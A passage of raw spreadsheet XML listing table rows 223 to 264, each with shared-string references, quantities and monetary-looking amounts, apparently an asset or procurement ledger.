      <c r="G223" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H223" s="11">
        <v>1</v>
      </c>
      <c r="I223" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J223" s="126">
        <v>83845</v>
      </c>
      <c r="K223" s="99">
        <v>23464</v>
      </c>
      <c r="L223" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="224" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A224" s="93"/>
      <c r="B224" s="88">
        <v>218</v>
      </c>
      <c r="C224" s="237" t="s">
        <v>3288</v>
      </c>
      <c r="D224" s="238" t="s">
        <v>3284</v>
      </c>
      <c r="E224" s="238" t="s">
        <v>2883</v>
      </c>
      <c r="F224" s="9"/>
      <c r="G224" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H224" s="11">
        <v>1</v>
      </c>
      <c r="I224" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J224" s="126">
        <v>81780</v>
      </c>
      <c r="K224" s="99">
        <v>22876</v>
      </c>
      <c r="L224" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="225" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A225" s="93"/>
      <c r="B225" s="88">
        <v>219</v>
      </c>
      <c r="C225" s="237" t="s">
        <v>3289</v>
      </c>
      <c r="D225" s="238" t="s">
        <v>2987</v>
      </c>
      <c r="E225" s="238" t="s">
        <v>3290</v>
      </c>
      <c r="F225" s="9"/>
      <c r="G225" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H225" s="11">
        <v>1</v>
      </c>
      <c r="I225" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J225" s="126">
        <v>98000</v>
      </c>
      <c r="K225" s="99">
        <v>27440</v>
      </c>
      <c r="L225" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="226" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A226" s="93"/>
      <c r="B226" s="88">
        <v>220</v>
      </c>
      <c r="C226" s="237" t="s">
        <v>3291</v>
      </c>
      <c r="D226" s="238" t="s">
        <v>3284</v>
      </c>
      <c r="E226" s="238" t="s">
        <v>2883</v>
      </c>
      <c r="F226" s="9"/>
      <c r="G226" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H226" s="11">
        <v>2</v>
      </c>
      <c r="I226" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J226" s="126">
        <v>164200</v>
      </c>
      <c r="K226" s="99">
        <v>45976</v>
      </c>
      <c r="L226" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="227" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A227" s="93"/>
      <c r="B227" s="88">
        <v>221</v>
      </c>
      <c r="C227" s="237" t="s">
        <v>3292</v>
      </c>
      <c r="D227" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E227" s="238" t="s">
        <v>3293</v>
      </c>
      <c r="F227" s="9"/>
      <c r="G227" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H227" s="11">
        <v>1</v>
      </c>
      <c r="I227" s="238" t="s">
        <v>982</v>
      </c>
      <c r="J227" s="126">
        <v>80400</v>
      </c>
      <c r="K227" s="99">
        <v>22512</v>
      </c>
      <c r="L227" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="228" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A228" s="93"/>
      <c r="B228" s="88">
        <v>222</v>
      </c>
      <c r="C228" s="237" t="s">
        <v>3294</v>
      </c>
      <c r="D228" s="238" t="s">
        <v>3295</v>
      </c>
      <c r="E228" s="238" t="s">
        <v>3296</v>
      </c>
      <c r="F228" s="9"/>
      <c r="G228" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H228" s="11">
        <v>1</v>
      </c>
      <c r="I228" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J228" s="126">
        <v>197000</v>
      </c>
      <c r="K228" s="99">
        <v>55160</v>
      </c>
      <c r="L228" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="229" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A229" s="93"/>
      <c r="B229" s="88">
        <v>223</v>
      </c>
      <c r="C229" s="237" t="s">
        <v>3297</v>
      </c>
      <c r="D229" s="238" t="s">
        <v>3298</v>
      </c>
      <c r="E229" s="238" t="s">
        <v>3299</v>
      </c>
      <c r="F229" s="9"/>
      <c r="G229" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H229" s="11">
        <v>1</v>
      </c>
      <c r="I229" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J229" s="126">
        <v>207000</v>
      </c>
      <c r="K229" s="99">
        <v>57960</v>
      </c>
      <c r="L229" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="230" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A230" s="93"/>
      <c r="B230" s="88">
        <v>224</v>
      </c>
      <c r="C230" s="237" t="s">
        <v>3300</v>
      </c>
      <c r="D230" s="238" t="s">
        <v>3301</v>
      </c>
      <c r="E230" s="238" t="s">
        <v>3302</v>
      </c>
      <c r="F230" s="9"/>
      <c r="G230" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H230" s="11">
        <v>1</v>
      </c>
      <c r="I230" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J230" s="126">
        <v>100000</v>
      </c>
      <c r="K230" s="99">
        <v>28000</v>
      </c>
      <c r="L230" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="231" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A231" s="93"/>
      <c r="B231" s="88">
        <v>225</v>
      </c>
      <c r="C231" s="237" t="s">
        <v>3303</v>
      </c>
      <c r="D231" s="238" t="s">
        <v>3304</v>
      </c>
      <c r="E231" s="238" t="s">
        <v>3015</v>
      </c>
      <c r="F231" s="9"/>
      <c r="G231" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H231" s="11">
        <v>2</v>
      </c>
      <c r="I231" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J231" s="126">
        <v>15000</v>
      </c>
      <c r="K231" s="99">
        <v>4200</v>
      </c>
      <c r="L231" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="232" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A232" s="93"/>
      <c r="B232" s="88">
        <v>226</v>
      </c>
      <c r="C232" s="237" t="s">
        <v>3305</v>
      </c>
      <c r="D232" s="238" t="s">
        <v>3306</v>
      </c>
      <c r="E232" s="238" t="s">
        <v>3015</v>
      </c>
      <c r="F232" s="9"/>
      <c r="G232" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H232" s="11">
        <v>2</v>
      </c>
      <c r="I232" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J232" s="126">
        <v>8000</v>
      </c>
      <c r="K232" s="99">
        <v>5040</v>
      </c>
      <c r="L232" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="233" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A233" s="93"/>
      <c r="B233" s="88">
        <v>227</v>
      </c>
      <c r="C233" s="237" t="s">
        <v>3307</v>
      </c>
      <c r="D233" s="238" t="s">
        <v>3308</v>
      </c>
      <c r="E233" s="238" t="s">
        <v>2883</v>
      </c>
      <c r="F233" s="9"/>
      <c r="G233" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H233" s="11">
        <v>2</v>
      </c>
      <c r="I233" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J233" s="126">
        <v>14000</v>
      </c>
      <c r="K233" s="99">
        <v>3920</v>
      </c>
      <c r="L233" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="234" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A234" s="93"/>
      <c r="B234" s="88">
        <v>228</v>
      </c>
      <c r="C234" s="237" t="s">
        <v>3309</v>
      </c>
      <c r="D234" s="238" t="s">
        <v>2970</v>
      </c>
      <c r="E234" s="238" t="s">
        <v>2971</v>
      </c>
      <c r="F234" s="9"/>
      <c r="G234" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H234" s="11">
        <v>1</v>
      </c>
      <c r="I234" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J234" s="126">
        <v>250000</v>
      </c>
      <c r="K234" s="99">
        <v>70000</v>
      </c>
      <c r="L234" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="235" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A235" s="93"/>
      <c r="B235" s="88">
        <v>229</v>
      </c>
      <c r="C235" s="237" t="s">
        <v>3310</v>
      </c>
      <c r="D235" s="238" t="s">
        <v>1280</v>
      </c>
      <c r="E235" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F235" s="9"/>
      <c r="G235" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H235" s="11">
        <v>5</v>
      </c>
      <c r="I235" s="238" t="s">
        <v>637</v>
      </c>
      <c r="J235" s="126">
        <v>754839.5</v>
      </c>
      <c r="K235" s="99">
        <v>211344</v>
      </c>
      <c r="L235" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="236" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A236" s="93"/>
      <c r="B236" s="88">
        <v>230</v>
      </c>
      <c r="C236" s="237" t="s">
        <v>3311</v>
      </c>
      <c r="D236" s="238" t="s">
        <v>3312</v>
      </c>
      <c r="E236" s="238" t="s">
        <v>3313</v>
      </c>
      <c r="F236" s="9"/>
      <c r="G236" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H236" s="11">
        <v>1</v>
      </c>
      <c r="I236" s="238" t="s">
        <v>3085</v>
      </c>
      <c r="J236" s="126">
        <v>8547.01</v>
      </c>
      <c r="K236" s="99">
        <v>3264</v>
      </c>
      <c r="L236" s="238" t="s">
        <v>3086</v>
      </c>
    </row>
    <row r="237" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A237" s="93"/>
      <c r="B237" s="88">
        <v>231</v>
      </c>
      <c r="C237" s="237" t="s">
        <v>3314</v>
      </c>
      <c r="D237" s="238" t="s">
        <v>3315</v>
      </c>
      <c r="E237" s="10"/>
      <c r="F237" s="9"/>
      <c r="G237" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H237" s="11">
        <v>1</v>
      </c>
      <c r="I237" s="238" t="s">
        <v>3316</v>
      </c>
      <c r="J237" s="126">
        <v>95000</v>
      </c>
      <c r="K237" s="99">
        <v>0</v>
      </c>
      <c r="L237" s="10"/>
    </row>
    <row r="238" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A238" s="93"/>
      <c r="B238" s="88">
        <v>232</v>
      </c>
      <c r="C238" s="237" t="s">
        <v>3317</v>
      </c>
      <c r="D238" s="238" t="s">
        <v>3318</v>
      </c>
      <c r="E238" s="238" t="s">
        <v>2971</v>
      </c>
      <c r="F238" s="9"/>
      <c r="G238" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H238" s="11">
        <v>2</v>
      </c>
      <c r="I238" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J238" s="126">
        <v>152692</v>
      </c>
      <c r="K238" s="99">
        <v>42728</v>
      </c>
      <c r="L238" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="239" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A239" s="93"/>
      <c r="B239" s="88">
        <v>233</v>
      </c>
      <c r="C239" s="237" t="s">
        <v>3319</v>
      </c>
      <c r="D239" s="238" t="s">
        <v>3320</v>
      </c>
      <c r="E239" s="238" t="s">
        <v>3321</v>
      </c>
      <c r="F239" s="9"/>
      <c r="G239" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H239" s="11">
        <v>2</v>
      </c>
      <c r="I239" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J239" s="126">
        <v>143274</v>
      </c>
      <c r="K239" s="99">
        <v>40096</v>
      </c>
      <c r="L239" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="240" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A240" s="93"/>
      <c r="B240" s="88">
        <v>234</v>
      </c>
      <c r="C240" s="237" t="s">
        <v>3322</v>
      </c>
      <c r="D240" s="238" t="s">
        <v>3323</v>
      </c>
      <c r="E240" s="238" t="s">
        <v>561</v>
      </c>
      <c r="F240" s="9"/>
      <c r="G240" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H240" s="11">
        <v>1</v>
      </c>
      <c r="I240" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J240" s="126">
        <v>2454948</v>
      </c>
      <c r="K240" s="99">
        <v>687372</v>
      </c>
      <c r="L240" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="241" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A241" s="93"/>
      <c r="B241" s="88">
        <v>235</v>
      </c>
      <c r="C241" s="237" t="s">
        <v>3324</v>
      </c>
      <c r="D241" s="238" t="s">
        <v>3325</v>
      </c>
      <c r="E241" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F241" s="9"/>
      <c r="G241" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H241" s="11">
        <v>1</v>
      </c>
      <c r="I241" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J241" s="126">
        <v>380000</v>
      </c>
      <c r="K241" s="99">
        <v>106400</v>
      </c>
      <c r="L241" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="242" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A242" s="93"/>
      <c r="B242" s="88">
        <v>236</v>
      </c>
      <c r="C242" s="237" t="s">
        <v>3326</v>
      </c>
      <c r="D242" s="238" t="s">
        <v>3327</v>
      </c>
      <c r="E242" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F242" s="9"/>
      <c r="G242" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H242" s="11">
        <v>1</v>
      </c>
      <c r="I242" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J242" s="126">
        <v>300000</v>
      </c>
      <c r="K242" s="99">
        <v>84000</v>
      </c>
      <c r="L242" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="243" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A243" s="93"/>
      <c r="B243" s="88">
        <v>237</v>
      </c>
      <c r="C243" s="237" t="s">
        <v>3328</v>
      </c>
      <c r="D243" s="238" t="s">
        <v>3329</v>
      </c>
      <c r="E243" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F243" s="9"/>
      <c r="G243" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H243" s="11">
        <v>1</v>
      </c>
      <c r="I243" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J243" s="126">
        <v>60000</v>
      </c>
      <c r="K243" s="99">
        <v>16800</v>
      </c>
      <c r="L243" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="244" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A244" s="93"/>
      <c r="B244" s="88">
        <v>238</v>
      </c>
      <c r="C244" s="237" t="s">
        <v>3330</v>
      </c>
      <c r="D244" s="238" t="s">
        <v>3331</v>
      </c>
      <c r="E244" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F244" s="9"/>
      <c r="G244" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H244" s="11">
        <v>1</v>
      </c>
      <c r="I244" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J244" s="126">
        <v>60000</v>
      </c>
      <c r="K244" s="99">
        <v>16800</v>
      </c>
      <c r="L244" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="245" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A245" s="93"/>
      <c r="B245" s="88">
        <v>239</v>
      </c>
      <c r="C245" s="237" t="s">
        <v>3332</v>
      </c>
      <c r="D245" s="238" t="s">
        <v>3333</v>
      </c>
      <c r="E245" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F245" s="9"/>
      <c r="G245" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H245" s="11">
        <v>1</v>
      </c>
      <c r="I245" s="238" t="s">
        <v>1309</v>
      </c>
      <c r="J245" s="126">
        <v>50000</v>
      </c>
      <c r="K245" s="99">
        <v>14000</v>
      </c>
      <c r="L245" s="10"/>
    </row>
    <row r="246" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A246" s="93"/>
      <c r="B246" s="88">
        <v>240</v>
      </c>
      <c r="C246" s="237" t="s">
        <v>3334</v>
      </c>
      <c r="D246" s="238" t="s">
        <v>3335</v>
      </c>
      <c r="E246" s="238" t="s">
        <v>3321</v>
      </c>
      <c r="F246" s="9"/>
      <c r="G246" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H246" s="11">
        <v>1</v>
      </c>
      <c r="I246" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J246" s="126">
        <v>136280</v>
      </c>
      <c r="K246" s="99">
        <v>38136</v>
      </c>
      <c r="L246" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="247" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A247" s="93"/>
      <c r="B247" s="88">
        <v>241</v>
      </c>
      <c r="C247" s="237" t="s">
        <v>3336</v>
      </c>
      <c r="D247" s="238" t="s">
        <v>3337</v>
      </c>
      <c r="E247" s="238" t="s">
        <v>2971</v>
      </c>
      <c r="F247" s="9"/>
      <c r="G247" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H247" s="11">
        <v>1</v>
      </c>
      <c r="I247" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J247" s="126">
        <v>93720</v>
      </c>
      <c r="K247" s="99">
        <v>26236</v>
      </c>
      <c r="L247" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="248" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A248" s="93"/>
      <c r="B248" s="88">
        <v>242</v>
      </c>
      <c r="C248" s="237" t="s">
        <v>3338</v>
      </c>
      <c r="D248" s="238" t="s">
        <v>3339</v>
      </c>
      <c r="E248" s="238" t="s">
        <v>3340</v>
      </c>
      <c r="F248" s="9"/>
      <c r="G248" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H248" s="11">
        <v>1</v>
      </c>
      <c r="I248" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J248" s="126">
        <v>27800</v>
      </c>
      <c r="K248" s="99">
        <v>7784</v>
      </c>
      <c r="L248" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="249" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A249" s="93"/>
      <c r="B249" s="88">
        <v>243</v>
      </c>
      <c r="C249" s="237" t="s">
        <v>3341</v>
      </c>
      <c r="D249" s="238" t="s">
        <v>3342</v>
      </c>
      <c r="E249" s="238" t="s">
        <v>3343</v>
      </c>
      <c r="F249" s="9"/>
      <c r="G249" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H249" s="11">
        <v>1</v>
      </c>
      <c r="I249" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J249" s="126">
        <v>620000</v>
      </c>
      <c r="K249" s="99">
        <v>173600</v>
      </c>
      <c r="L249" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="250" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A250" s="93"/>
      <c r="B250" s="88">
        <v>244</v>
      </c>
      <c r="C250" s="237" t="s">
        <v>3344</v>
      </c>
      <c r="D250" s="238" t="s">
        <v>431</v>
      </c>
      <c r="E250" s="238" t="s">
        <v>3205</v>
      </c>
      <c r="F250" s="9"/>
      <c r="G250" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H250" s="11">
        <v>2</v>
      </c>
      <c r="I250" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J250" s="126">
        <v>450000</v>
      </c>
      <c r="K250" s="99">
        <v>126000</v>
      </c>
      <c r="L250" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="251" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A251" s="93"/>
      <c r="B251" s="88">
        <v>245</v>
      </c>
      <c r="C251" s="237" t="s">
        <v>3345</v>
      </c>
      <c r="D251" s="238" t="s">
        <v>3346</v>
      </c>
      <c r="E251" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F251" s="9"/>
      <c r="G251" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H251" s="11">
        <v>1</v>
      </c>
      <c r="I251" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J251" s="126">
        <v>14000</v>
      </c>
      <c r="K251" s="99">
        <v>0</v>
      </c>
      <c r="L251" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="252" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A252" s="93"/>
      <c r="B252" s="88">
        <v>246</v>
      </c>
      <c r="C252" s="237" t="s">
        <v>3347</v>
      </c>
      <c r="D252" s="238" t="s">
        <v>3348</v>
      </c>
      <c r="E252" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F252" s="9"/>
      <c r="G252" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H252" s="11">
        <v>1</v>
      </c>
      <c r="I252" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J252" s="126">
        <v>10000</v>
      </c>
      <c r="K252" s="99">
        <v>0</v>
      </c>
      <c r="L252" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="253" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A253" s="93"/>
      <c r="B253" s="88">
        <v>247</v>
      </c>
      <c r="C253" s="237" t="s">
        <v>3349</v>
      </c>
      <c r="D253" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E253" s="238" t="s">
        <v>3350</v>
      </c>
      <c r="F253" s="9"/>
      <c r="G253" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H253" s="11">
        <v>1</v>
      </c>
      <c r="I253" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J253" s="126">
        <v>9800</v>
      </c>
      <c r="K253" s="99">
        <v>0</v>
      </c>
      <c r="L253" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="254" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A254" s="93"/>
      <c r="B254" s="88">
        <v>248</v>
      </c>
      <c r="C254" s="237" t="s">
        <v>3351</v>
      </c>
      <c r="D254" s="238" t="s">
        <v>3352</v>
      </c>
      <c r="E254" s="238" t="s">
        <v>3353</v>
      </c>
      <c r="F254" s="9"/>
      <c r="G254" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H254" s="11">
        <v>1</v>
      </c>
      <c r="I254" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J254" s="126">
        <v>33400</v>
      </c>
      <c r="K254" s="99">
        <v>9352</v>
      </c>
      <c r="L254" s="10"/>
    </row>
    <row r="255" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A255" s="93"/>
      <c r="B255" s="88">
        <v>249</v>
      </c>
      <c r="C255" s="237" t="s">
        <v>3354</v>
      </c>
      <c r="D255" s="238" t="s">
        <v>3067</v>
      </c>
      <c r="E255" s="238" t="s">
        <v>3355</v>
      </c>
      <c r="F255" s="9"/>
      <c r="G255" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H255" s="11">
        <v>1</v>
      </c>
      <c r="I255" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J255" s="126">
        <v>95500</v>
      </c>
      <c r="K255" s="99">
        <v>0</v>
      </c>
      <c r="L255" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="256" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A256" s="93"/>
      <c r="B256" s="88">
        <v>250</v>
      </c>
      <c r="C256" s="237" t="s">
        <v>3356</v>
      </c>
      <c r="D256" s="238" t="s">
        <v>3357</v>
      </c>
      <c r="E256" s="10" t="s">
        <v>3358</v>
      </c>
      <c r="F256" s="9"/>
      <c r="G256" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H256" s="11">
        <v>2</v>
      </c>
      <c r="I256" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J256" s="126">
        <v>3300</v>
      </c>
      <c r="K256" s="99">
        <v>369.6</v>
      </c>
      <c r="L256" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="257" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A257" s="93"/>
      <c r="B257" s="88">
        <v>251</v>
      </c>
      <c r="C257" s="237" t="s">
        <v>3359</v>
      </c>
      <c r="D257" s="238" t="s">
        <v>3360</v>
      </c>
      <c r="E257" s="10"/>
      <c r="F257" s="9"/>
      <c r="G257" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H257" s="11">
        <v>1</v>
      </c>
      <c r="I257" s="238" t="s">
        <v>725</v>
      </c>
      <c r="J257" s="126">
        <v>229600</v>
      </c>
      <c r="K257" s="99">
        <v>0</v>
      </c>
      <c r="L257" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="258" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A258" s="93"/>
      <c r="B258" s="88">
        <v>252</v>
      </c>
      <c r="C258" s="237" t="s">
        <v>3361</v>
      </c>
      <c r="D258" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E258" s="238" t="s">
        <v>3362</v>
      </c>
      <c r="F258" s="9"/>
      <c r="G258" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H258" s="11">
        <v>2</v>
      </c>
      <c r="I258" s="238" t="s">
        <v>3363</v>
      </c>
      <c r="J258" s="126">
        <v>43000</v>
      </c>
      <c r="K258" s="99">
        <v>0</v>
      </c>
      <c r="L258" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="259" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A259" s="93"/>
      <c r="B259" s="88">
        <v>253</v>
      </c>
      <c r="C259" s="237" t="s">
        <v>3364</v>
      </c>
      <c r="D259" s="238" t="s">
        <v>3365</v>
      </c>
      <c r="E259" s="238" t="s">
        <v>3366</v>
      </c>
      <c r="F259" s="9"/>
      <c r="G259" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H259" s="11">
        <v>1</v>
      </c>
      <c r="I259" s="238" t="s">
        <v>3367</v>
      </c>
      <c r="J259" s="126">
        <v>335000</v>
      </c>
      <c r="K259" s="99">
        <v>0</v>
      </c>
      <c r="L259" s="10"/>
    </row>
    <row r="260" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A260" s="93"/>
      <c r="B260" s="88">
        <v>254</v>
      </c>
      <c r="C260" s="237" t="s">
        <v>3368</v>
      </c>
      <c r="D260" s="238" t="s">
        <v>3023</v>
      </c>
      <c r="E260" s="238" t="s">
        <v>3369</v>
      </c>
      <c r="F260" s="9"/>
      <c r="G260" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H260" s="11">
        <v>2</v>
      </c>
      <c r="I260" s="238" t="s">
        <v>1465</v>
      </c>
      <c r="J260" s="126">
        <v>104000</v>
      </c>
      <c r="K260" s="99">
        <v>0</v>
      </c>
      <c r="L260" s="10"/>
    </row>
    <row r="261" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A261" s="93"/>
      <c r="B261" s="88">
        <v>255</v>
      </c>
      <c r="C261" s="237" t="s">
        <v>3370</v>
      </c>
      <c r="D261" s="238" t="s">
        <v>1176</v>
      </c>
      <c r="E261" s="238" t="s">
        <v>3371</v>
      </c>
      <c r="F261" s="9"/>
      <c r="G261" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H261" s="11">
        <v>2</v>
      </c>
      <c r="I261" s="238" t="s">
        <v>1465</v>
      </c>
      <c r="J261" s="126">
        <v>20000</v>
      </c>
      <c r="K261" s="99">
        <v>4800</v>
      </c>
      <c r="L261" s="10"/>
    </row>
    <row r="262" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A262" s="93"/>
      <c r="B262" s="88">
        <v>256</v>
      </c>
      <c r="C262" s="237" t="s">
        <v>3372</v>
      </c>
      <c r="D262" s="238" t="s">
        <v>3373</v>
      </c>
      <c r="E262" s="10"/>
      <c r="F262" s="9"/>
      <c r="G262" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H262" s="11">
        <v>1</v>
      </c>
      <c r="I262" s="238" t="s">
        <v>612</v>
      </c>
      <c r="J262" s="126">
        <v>2859791.73</v>
      </c>
      <c r="K262" s="99">
        <v>320286.4</v>
      </c>
      <c r="L262" s="10"/>
    </row>
    <row r="263" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A263" s="93"/>
      <c r="B263" s="88">
        <v>257</v>
      </c>
      <c r="C263" s="237" t="s">
        <v>3374</v>
      </c>
      <c r="D263" s="238" t="s">
        <v>3375</v>
      </c>
      <c r="E263" s="238" t="s">
        <v>3376</v>
      </c>
      <c r="F263" s="9"/>
      <c r="G263" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H263" s="11">
        <v>1</v>
      </c>
      <c r="I263" s="238" t="s">
        <v>3377</v>
      </c>
      <c r="J263" s="126">
        <v>348110</v>
      </c>
      <c r="K263" s="99">
        <v>0</v>
      </c>
      <c r="L263" s="10"/>
    </row>
    <row r="264" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A264" s="93"/>
      <c r="B264" s="88">
        <v>258</v>
      </c>
      <c r="C264" s="237" t="s">
        <v>3378</v>
      </c>
      <c r="D264" s="238" t="s">
        <v>3379</v>
      </c>
      <c r="E264" s="238" t="s">
        <v>3380</v>
      </c>
      <c r="F264" s="9"/>
      <c r="G264" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H264" s="11">
        <v>4</v>
      </c>
      <c r="I264" s="238" t="s">
        <v>3377</v>
      </c>
